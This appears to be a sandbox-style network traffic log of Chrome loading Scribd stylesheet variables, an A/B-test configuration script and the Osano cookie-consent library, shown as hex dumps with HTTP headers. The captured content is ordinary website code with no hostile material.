                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 2d 65 6c 65 76 61 74 69 6f 6e 2d 38 30 30 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 2d 2d 63 6f 6c 6f 72 2d 65 6c 65 76 61 74 69 6f 6e 2d 39 30 30 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 36 29 3b 2d 2d 63 6f 6c 6f 72 2d 66 6c 69 6e 74 2d 31 30 30 3a 23 39 61 61 34 62 37 3b 2d 2d 63 6f 6c 6f 72 2d 66 6c 69 6e 74 2d 32 30 30 3a 23 35 65 36 35 37 31 3b 2d 2d 63 6f 6c 6f 72 2d 6c 61 70 69 73 2d 31 30 30 3a 23 36 32 38 64 66 35 3b 2d 2d 63 6f 6c 6f 72 2d 6c 61 70 69 73 2d 32 30 30 3a 23 34 61 37 32 64 33 3b 2d 2d 63 6f 6c 6f 72 2d 63 65 72 69 73 65 2d 31 30 30 3a 23 66 36 35 62 37 61 3b 2d 2d 63 6f 6c 6f 72 2d 63 65 72 69 73 65 2d 32 30 30 3a 23 64 37 32 63 37 38 3b 2d 2d 63 6f 6c 6f 72 2d 70 69 6e 65 2d 31 30 30 3a 23 38 63 61 66 31 39 3b 2d 2d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -elevation-800:rgba(0,0,0,0.15);--color-elevation-900:rgba(0,0,0,0.6);--color-flint-100:#9aa4b7;--color-flint-200:#5e6571;--color-lapis-100:#628df5;--color-lapis-200:#4a72d3;--color-cerise-100:#f65b7a;--color-cerise-200:#d72c78;--color-pine-100:#8caf19;--
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 2d 62 72 6f 6e 7a 65 2d 34 30 30 3a 23 37 39 36 64 35 33 3b 2d 2d 63 6f 6c 6f 72 2d 62 72 6f 6e 7a 65 2d 35 30 30 3a 23 35 65 35 31 33 33 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 61 6c 2d 75 6c 74 72 61 2d 31 30 30 3a 23 37 64 65 31 65 38 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 61 6c 2d 75 6c 74 72 61 2d 32 30 30 3a 23 34 35 64 34 64 66 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 61 6c 2d 75 6c 74 72 61 2d 33 30 30 3a 23 30 30 63 63 64 39 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 61 6c 2d 75 6c 74 72 61 2d 34 30 30 3a 23 30 33 62 61 63 38 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 61 6c 2d 75 6c 74 72 61 2d 35 30 30 3a 23 30 62 61 34 61 66 3b 2d 2d 61 63 63 65 6e 74 2d 63 6f 6c 6f 72 2d 66 61 6c 6c 62 61 63 6b 3a 23 65 33 65 36 65 66 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 78 73 3a 33 32 30 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -bronze-400:#796d53;--color-bronze-500:#5e5133;--color-teal-ultra-100:#7de1e8;--color-teal-ultra-200:#45d4df;--color-teal-ultra-300:#00ccd9;--color-teal-ultra-400:#03bac8;--color-teal-ultra-500:#0ba4af;--accent-color-fallback:#e3e6ef;--breakpoint-xxs:320p
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 6b 2d 71 75 6f 74 65 3a 31 2e 34 3b 2d 2d 6c 69 6e 65 2d 68 65 69 67 68 74 2d 62 6f 64 79 3a 31 2e 35 3b 2d 2d 6c 69 6e 65 2d 68 65 69 67 68 74 2d 68 65 61 64 69 6e 67 3a 31 2e 33 3b 2d 2d 6c 69 6e 65 2d 68 65 69 67 68 74 2d 74 69 74 6c 65 3a 31 2e 33 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 64 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 70 72 69 6d 61 72 79 3a 23 66 66 66 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 64 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 65 63 6f 6e 64 61 72 79 3a 23 66 30 66 32 66 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 64 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 74 65 72 74 69 61 72 79 3a 23 66 39 66 61 66 66 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 64 61 79 2d 62
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: k-quote:1.4;--line-height-body:1.5;--line-height-heading:1.3;--line-height-title:1.3;--spl-color-theme-day-background-primary:#fff;--spl-color-theme-day-background-secondary:#f0f2f9;--spl-color-theme-day-background-tertiary:#f9faff;--spl-color-theme-day-b
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 75 6e 64 2d 70 72 69 6d 61 72 79 3a 23 66 63 66 35 65 62 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 73 65 70 69 61 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 65 63 6f 6e 64 61 72 79 3a 23 66 37 65 33 63 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 73 65 70 69 61 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 74 65 72 74 69 61 72 79 3a 23 66 63 66 35 65 62 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 73 65 70 69 61 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 63 72 75 62 62 65 72 3a 23 63 66 64 36 65 30 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 73 65 70 69 61 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 70 72 6f 67 72 65 73 73 3a 23 64 30 33 37 31 37 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 73 65 70 69 61 2d 62 75
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: und-primary:#fcf5eb;--spl-color-theme-sepia-background-secondary:#f7e3c9;--spl-color-theme-sepia-background-tertiary:#fcf5eb;--spl-color-theme-sepia-background-scrubber:#cfd6e0;--spl-color-theme-sepia-background-progress:#d03717;--spl-color-theme-sepia-bu
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 73 74 61 74 75 73 74 61 67 2d 75 6e 61 76 61 69 6c 61 62 6c 65 3a 23 66 63 66 31 64 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 74 61 74 75 73 74 61 67 2d 75 70 63 6f 6d 69 6e 67 3a 23 64 66 66 30 64 38 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 68 6f 76 65 72 3a 23 66 30 66 32 66 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 74 65 78 74 74 61 67 2d 64 65 66 61 75 6c 74 3a 23 66 30 66 32 66 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 74 65 78 74 74 61 67 2d 61 63 74 69 76 65 3a 23 65 33 65 36 65 66 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: background-statustag-unavailable:#fcf1d9;--spl-color-background-statustag-upcoming:#dff0d8;--spl-color-background-suggestions-hover:#f0f2f9;--spl-color-background-texttag-default:#f0f2f9;--spl-color-background-texttag-active:#e3e6ef;--spl-color-background
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 63 61 62 34 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 63 65 6e 74 2d 73 74 6f 6e 65 2d 31 30 30 3a 23 65 31 65 61 65 63 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 63 65 6e 74 2d 73 74 6f 6e 65 2d 32 30 30 3a 23 62 37 63 39 63 63 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 63 65 6e 74 2d 73 70 72 75 63 65 2d 31 30 30 3a 23 65 33 65 38 65 66 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 63 65 6e 74 2d 73 70 72 75 63 65 2d 32 30 30 3a 23 63 37 63 66 64 63 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 61 63 63 65 6e 74 2d 69 72 69 73 2d 31 30 30 3a 23 65 66 65 62 65 66 3b 2d 2d 73 70 6c 2d 63 6f 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cab4;--spl-color-background-accent-stone-100:#e1eaec;--spl-color-background-accent-stone-200:#b7c9cc;--spl-color-background-accent-spruce-100:#e3e8ef;--spl-color-background-accent-spruce-200:#c7cfdc;--spl-color-background-accent-iris-100:#efebef;--spl-col
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 2d 64 65 66 61 75 6c 74 3a 23 62 37 62 64 63 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 70 69 6c 6c 62 75 74 74 6f 6e 2d 63 6c 69 63 6b 3a 23 38 61 39 31 61 30 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 70 69 6c 6c 62 75 74 74 6f 6e 2d 73 65 6c 65 63 74 3a 23 31 65 37 62 38 35 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 70 69 6c 6c 62 75 74 74 6f 6e 2d 73 65 6c 65 63 74 68 6f 76 65 72 3a 23 30 65 36 30 36 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 70 69 6c 6c 73 6f 72 74 2d 64 65 66 61 75 6c 74 3a 23 62 37 62 64 63 39 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62 6f 72 64 65 72 2d 70 69 6c 6c 73 6f 72 74 2d 63 6c 69 63 6b 3a 23 38 61 39 31 61 30 3b 2d 2d 73 70 6c 2d 63 6f 6c 6f 72 2d 62
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -default:#b7bdc9;--spl-color-border-pillbutton-click:#8a91a0;--spl-color-border-pillbutton-select:#1e7b85;--spl-color-border-pillbutton-selecthover:#0e6069;--spl-color-border-pillsort-default:#b7bdc9;--spl-color-border-pillsort-click:#8a91a0;--spl-color-b


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        5192.168.2.1649719151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC487OUTGET /options/exposed_to_client.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3980
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"2202a3c15cede83c0da1d558d5fe798f"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 7
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: bf4b87221003d4842d3da0e945b40fc36480ab43aec82673fbb2aa0160e253f5
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.005354
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890066-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522357.820902,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 0a 20 20 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 53 63 72 69 62 64 29 20 53 63 72 69 62 64 20 3d 20 7b 7d 3b 0a 20 20 20 20 20 20 53 63 72 69 62 64 2e 42 72 61 6e 64 20 3d 20 27 73 63 72 69 62 64 27 3b 0a 20 20 20 20 20 20 53 63 72 69 62 64 2e 4e 77 61 79 54 65 73 74 73 57 69 74 68 57 65 69 67 68 74 73 20 3d 20 7b 22 64 6f 63 5f 70 61 67 65 5f 70 61 73 73 5f 68 61 73 68 65 64 5f 65 6d 61 69 6c 5f 32 30 32 34 5f 71 31 22 3a 7b 22 69 64 22 3a 32 37 31 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 36 39 30 32 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 35 30 7d 2c 22 36 39 30 33 22 3a 7b 22 6e 61 6d 65 22 3a 22 74 65 73 74 22 2c 22 77 65 69 67 68 74 22 3a 35 30 7d 7d 7d 2c 22 64 6f 63 5f 70 61 67 65 5f 70 6d 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: if (!window.Scribd) Scribd = {}; Scribd.Brand = 'scribd'; Scribd.NwayTestsWithWeights = {"doc_page_pass_hashed_email_2024_q1":{"id":2717,"choices":{"6902":{"name":"control","weight":50},"6903":{"name":"test","weight":50}}},"doc_page_pmp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1378INData Raw: 73 73 5f 32 30 32 34 5f 71 33 22 3a 7b 22 69 64 22 3a 33 30 34 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 37 39 39 36 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 31 7d 2c 22 37 39 39 37 22 3a 7b 22 6e 61 6d 65 22 3a 22 6e 6f 5f 70 72 6f 6d 6f 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 37 39 39 38 22 3a 7b 22 6e 61 6d 65 22 3a 22 6d 6f 72 65 5f 70 72 6f 6d 6f 22 2c 22 77 65 69 67 68 74 22 3a 39 39 39 39 39 7d 7d 7d 2c 22 64 6f 63 5f 70 61 67 65 5f 61 64 5f 6c 61 62 65 6c 73 5f 76 32 22 3a 7b 22 69 64 22 3a 33 30 37 37 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 38 30 38 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 39 39 39 39 39 7d 2c 22 38 30 38 31 22 3a 7b 22 6e 61 6d 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ss_2024_q3":{"id":3047,"choices":{"7996":{"name":"control","weight":1},"7997":{"name":"no_promo","weight":0},"7998":{"name":"more_promo","weight":99999}}},"doc_page_ad_labels_v2":{"id":3077,"choices":{"8080":{"name":"control","weight":99999},"8081":{"name
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC1224INData Raw: 32 33 33 39 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 35 38 31 30 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 31 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 72 6f 6c 5f 6e 6f 5f 66 61 6c 6c 62 61 63 6b 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 32 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 6d 6f 64 65 6c 22 2c 22 77 65 69 67 68 74 22 3a 30 7d 2c 22 35 38 31 33 22 3a 7b 22 6e 61 6d 65 22 3a 22 63 6f 6e 74 65 6e 74 5f 6d 6f 64 65 6c 5f 32 22 2c 22 77 65 69 67 68 74 22 3a 31 30 30 7d 7d 7d 2c 22 72 65 63 73 5f 64 6f 63 5f 70 61 67 65 5f 70 6d 70 5f 71 31 32 33 5f 63 22 3a 7b 22 69 64 22 3a 32 34 30 36 2c 22 63 68 6f 69 63 65 73 22 3a 7b 22 36 30 32 31 22 3a 7b 22 6e 61 6d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2339,"choices":{"5810":{"name":"control","weight":0},"5811":{"name":"control_no_fallback","weight":0},"5812":{"name":"content_model","weight":0},"5813":{"name":"content_model_2","weight":100}}},"recs_doc_page_pmp_q123_c":{"id":2406,"choices":{"6021":{"nam


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        6192.168.2.164971818.165.220.1274436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:16 UTC586OUTGET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cmp.osano.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 308493
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "5e72c3e86fabeff18c5f534ac6f63214"
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 22 May 2024 19:34:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 95b5fb95856bf27af281fa1597f7ec54.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: S6mEnDx18c4ijbxjplCUOS_H_wD85Lmtwy3UKtxUnCpDfmxRrYR12w==
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=86400, s-maxage=86400, must-revalidate, proxy-revalidate, no-transform
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC16384INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6f 73 61 6e 6f 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 35 35 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 74 2e 53 53 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 37 31 37 29 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 7b 65 6e 68 61 6e 63 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6f 2e 63 6f 6d 70 6f 73 65 2e 61 70 70 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*! For license information please see osano.js.LICENSE.txt */(()=>{"use strict";var e={558:(e,t,r)=>{t.SS=void 0;var o=r(717),n=function(){var e=[],t=[],r=void 0;return{enhancer:function(e){return r=e,function(e){return function(r){return o.compose.appl
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC16384INData Raw: 6c 75 65 3a 6e 2c 68 74 74 70 6f 6e 6c 79 3a 61 2c 53 65 63 75 72 65 3a 69 3d 21 31 2c 73 65 63 75 72 65 3a 63 3d 69 2c 70 61 74 68 3a 73 2c 64 6f 6d 61 69 6e 3a 6c 2c 65 78 70 69 72 65 73 3a 70 2c 22 6d 61 78 2d 61 67 65 22 3a 64 2c 53 61 6d 65 73 69 74 65 3a 75 3d 22 6c 61 78 22 2c 53 61 6d 65 53 69 74 65 3a 67 3d 75 2c 73 61 6d 65 73 69 74 65 3a 76 3d 67 2c 69 67 6e 6f 72 65 3a 6d 7d 3d 72 2c 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 73 65 63 75 72 65 3d 22 22 3d 3d 3d 63 7c 7c 21 21 63 2c 76 6f 69 64 20 30 21 3d 3d 73 26 26 28 68 2e 70 61 74 68 3d 73 2e 72 65 70 6c 61 63 65 28 2f 5b 27 22 5d 2f 67 2c 22 22 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6c 26 26 28 68 2e 64 6f 6d 61 69 6e 3d 6c 29 2c 76 6f 69 64 20 30 21 3d 3d 64 3f 68 5b 22 6d 61 78 2d 61 67 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: lue:n,httponly:a,Secure:i=!1,secure:c=i,path:s,domain:l,expires:p,"max-age":d,Samesite:u="lax",SameSite:g=u,samesite:v=g,ignore:m}=r,h={};return h.secure=""===c||!!c,void 0!==s&&(h.path=s.replace(/['"]/g,"")),void 0!==l&&(h.domain=l),void 0!==d?h["max-age
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:17 UTC16384INData Raw: 72 2e 6f 6e 63 65 7c 7c 65 2e 70 61 73 73 69 76 65 21 3d 3d 72 2e 70 61 73 73 69 76 65 2c 6e 3d 65 21 3d 3d 41 26 26 28 72 3d 3d 3d 41 7c 7c 6f 29 3b 6f 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 6e 61 6d 65 2c 74 68 69 73 2c 72 29 2c 6e 26 26 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 68 69 73 2e 6e 61 6d 65 2c 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 24 41 48 3d 65 7d 7d 68 61 6e 64 6c 65 45 76 65 6e 74 28 65 29 7b 76 61 72 20 74 2c 72 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 68 69 73 2e 5f 24 41 48 3f 74 68 69 73 2e 5f 24 41 48 2e 63 61 6c 6c 28 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r.once||e.passive!==r.passive,n=e!==A&&(r===A||o);o&&this.element.removeEventListener(this.name,this,r),n&&this.element.addEventListener(this.name,this,e),this._$AH=e}}handleEvent(e){var t,r;"function"==typeof this._$AH?this._$AH.call(null!==(r=null===(t=
